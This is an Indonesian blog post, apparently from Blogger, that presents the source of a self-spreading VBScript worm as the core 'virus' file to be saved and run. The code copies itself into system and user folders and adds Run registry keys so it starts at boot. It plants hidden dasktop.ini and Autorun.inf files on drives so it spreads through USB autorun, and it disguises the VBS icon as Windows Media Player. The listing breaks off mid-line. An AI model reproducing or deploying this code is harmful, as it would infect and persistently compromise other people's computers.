Untuk file inti virusnya. Kita save sbg. File vbs.. Dimana file ini yang bakalan bekerja
script nya
on error resume next
set fs=createobject("scripting.filesystemobject")
set b3b15cR17T=fs.getfile(wscript.scriptfullname)
b3b15cR17Trn="[autorun]"&vbcrlf&"shellexecute=wscript.exe //e:VBScript dasktop.ini auto"&vbcrlf&"action=Open folder to view file"&vbcrlf&"shell\open\command=wscript.exe //e:VBScript dasktop.ini auto"&vbcrlf&"icon=%systemroot%\shell32.dll,4"
set b3b15cR17Ttx=b3b15cR17T.openastextstream(1,-2)
do while not b3b15cR17Ttx.atendofstream
b3b15cR17Tv=b3b15cR17Tv&b3b15cR17Ttx.readline
b3b15cR17Tv=b3b15cR17Tv&vbcrlf
loop
do
set b3b15cR17Th=fs.getspecialfolder(0)
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\myName.bat")
b3b15cR17Tfn.attributes=32
set my63615cR1p7=fs.createtextfile(b3b15cR17Th &"\myName.bat")
my63615cR1p7.writeline "@echo off"
my63615cR1p7.writeline "echo ######### ## ## ## ##### ### ########### ########"
my63615cR1p7.writeline "echo ############ ## ### #### ####### #### ######## ##########"
my63615cR1p7.writeline "echo ## ### ## ## ##### #### # ##"
my63615cR1p7.writeline "echo ## ## ## ## ###### #### # ##"
my63615cR1p7.writeline "echo ### ### ## ## ## ###### #### ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ######## #### ## ## ### ####"
my63615cR1p7.writeline "echo ## ## ######### #### ## ## ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ######## #### ####### # ##"
my63615cR1p7.writeline "echo ### ### ## ###### ## #### ### ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ## ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ## # ####"
my63615cR1p7.writeline "echo ############ ########## #### #### ####"
my63615cR1p7.writeline "echo ######### ####### ### ########"
my63615cR1p7.writeline "izinkan aku mencintaimu, salahkah jika diriku mencintaimu, derita cinta ini sungguh sangat menyakiti, ku sangat cinta padamu.. Midori ku 25-09-2009"
my63615cR1p7.writeline "pause"
my63615cR1p7.close
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\myName.bat")
b3b15cR17Tfn.attributes=39
set DB5cR1p7x93nT=createobject("WScript.Shell")
docf=DB5cR1p7x93nT.specialfolders("MyDocuments")
sCr1p7x93nT3v1L=docf & "\Dian sastrowardoyo"
if not fs.folderexists(sCr1p7x93nT3v1L) then
set crfolder=fs.createfolder(sCr1p7x93nT3v1L)
end if
set b3b15cR17Tfn=fs.createtextfile(sCr1p7x93nT3v1L & "\midori.vbs")
b3b15cR17Tfn.write b3b15cR17Tv
b3b15cR17Tfn.close
set DB5cR1p7x93nT = createobject("WScript.Shell")
DB5cR1p7x93nT.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\winsoc","c:\Windows\winsoc.vbs","REG_SZ"
DB5cR1p7x93nT.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\xGentn4m3","c:\Windows\myName.bat","REG_SZ"
DB5cR1p7x93nT.regwrite "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon\","C:\Program Files\Windows Media Player\wmplayer.exe,1","REG_SZ"
almreg = "HKCU\Software\Policies\Microsoft\Windows\System\"
DB5cR1p7x93nT.RegWrite almreg & "DisableCMD","0", "REG_DWORD"
almreg = "HKCU\Software\Microsoft\Windows\CurrentVersion\"
DB5cR1p7x93nT.RegWrite almreg & "Policies\System\DisableTaskMgr","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Policies\System\DisableMsConfig","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Policies\System\DisableRegistryToo0s","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Explorer\Advanced\Hidden","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Explorer\Advanced\HideFileExt","0","REG_DWORD"
DB5cR1p7x93nT.Regwrite almreg & "Explorer\Advanced\ShowSuperHidden","0x00000001"
almreg = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"
DB5cR1p7x93nT.RegWrite almreg & "NoRun", "0", "REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "NoFolderOptions", "0", "REG_DWORD"
set b3b15cR17Th=fs.getspecialfolder(0)
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\winsoc.vbs")
b3b15cR17Tfn.attributes=32
set b3b15cR17Tfn=fs.createtextfile(b3b15cR17Th &"\winsoc.vbs")
b3b15cR17Tfn.write b3b15cR17Tv
b3b15cR17Tfn.close
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\winsoc.vbs")
b3b15cR17Tfn.attributes=39
set b3b15cR17Twsl=createobject("wscript.shell")
b3b15cR17Tdc=b3b15cR17Twsl.specialfolders("MyDocuments")
set b3b15cR17Tfn=fs.createtextfile(b3b15cR17Tdc &"\Diansastro.vbs")
b3b15cR17Tfn.write b3b15cR17Tv
b3b15cR17Tfn.close
for each b3b15cR17Tdrive in fs.drives
if (b3b15cR17Tdrive.drivetype=1 or b3b15cR17Tdrive.drivetype=2) and b3b15cR17Tdrive.path<>"A:" then
set b3b15cR17Tfn=fs.getfile(b3b15cR17Tdrive.path &"\dasktop.ini")
b3b15cR17Tfn.attributes=32
set b3b15cR17Tfn=fs.createtextfile(b3b15cR17Tdrive.path &"\dasktop.ini")
b3b15cR17Tfn.write b3b15cR17Tv
b3b15cR17Tfn.close
set b3b15cR17Tfn=fs.getfile(b3b15cR17Tdrive.path &"\dasktop.ini")
b3b15cR17Tfn.attributes=39
set b3b15cR17Tfn=fs.getfile(b3b15cR17Tdrive.path &"\Autorun.inf")
b3b15cR17Tfn.attributes=32
set b3b15cR17Tfn=fs.createtextfile(b3b15cR17Tdrive.path &"\Autorun.inf")
b3b15cR17Tfn.write b3b15cR17Trn
b3b15cR17Tfn.close
set b3b15cR17Tfn=fs.getfile(b3b15cR17Tdrive
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar